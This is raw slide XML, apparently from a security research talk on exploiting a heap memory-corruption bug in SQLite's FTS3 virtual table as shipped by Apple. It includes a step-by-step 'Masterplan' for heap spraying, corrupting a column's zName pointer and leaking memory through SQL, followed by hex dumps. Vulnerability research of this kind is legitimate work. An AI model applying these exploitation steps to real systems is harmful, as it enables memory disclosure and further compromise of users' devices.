                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6AB825"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>int</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00B0F0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>fts3DisconnectMethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>(sqlite3_vtab</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>pVtab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>){</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Fts3Table</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*p</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(Fts3Table</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>pVtab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>;</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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="6AB825"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>int</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err="1">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>// Snipped for brevity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="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p-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>pTokenizer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>pModule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>xDestroy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>     p-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>pTokenizer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="D0D0D0"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t> );</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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sqlite3_free(p);</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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6AB825"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>SQLITE_OK;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              <a:ea typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6402483" y="3847307"/>
            <a:ext cx="3513042" cy="75326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Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7335933" y="2114187"/>
            <a:ext cx="2131917" cy="31468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Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6412008" y="2618400"/>
            <a:ext cx="3513042" cy="314688"/>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Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8715116" y="2942613"/>
            <a:ext cx="2191009" cy="314688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtual Table Object</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4082717308"/>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72401" y="2801711"/>
            <a:ext cx="3460491" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stage 1 - 2</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818" y="1133475"/>
            <a:ext cx="4705350" cy="4705350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33377182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Key takeaways</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>C implementation of SQL statements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Parser phase, Bytecode Execution phase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>*Lots of* Heap Noise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>B-Trees </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(Table Values)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> are stored on-disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The Page Cache dynamically maps in/out the B-Trees from the disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The Page Cache merely holds slabs of pages from the database file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The objects of SELECT statement are short lived</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1638227882"/>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Masterplan</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pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spray a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HUGE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>as many to fill more than 2GB’s of memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>Place the vulnerable apple fts3 allocation in front of the spray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>Trigger the vulnerability, and corrupt one of the column object’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1"/>
              <a:t>zName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t> field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>Corrupt the field so that it points to an address that we want to leak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>Afterwards, try to leak the value through SQL statements.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2813541193"/>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3557" y="228600"/>
            <a:ext cx="4984490" cy="6391275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="50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101012" y="228600"/>
            <a:ext cx="4982542" cy="6391275"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6185808" y="1747097"/>
            <a:ext cx="4853666" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20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30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40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50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endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>60 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00 00 00 00 00 00 00 00 00 41 05 04 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>71</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>21 54 64 A0 21 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00 00 00 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
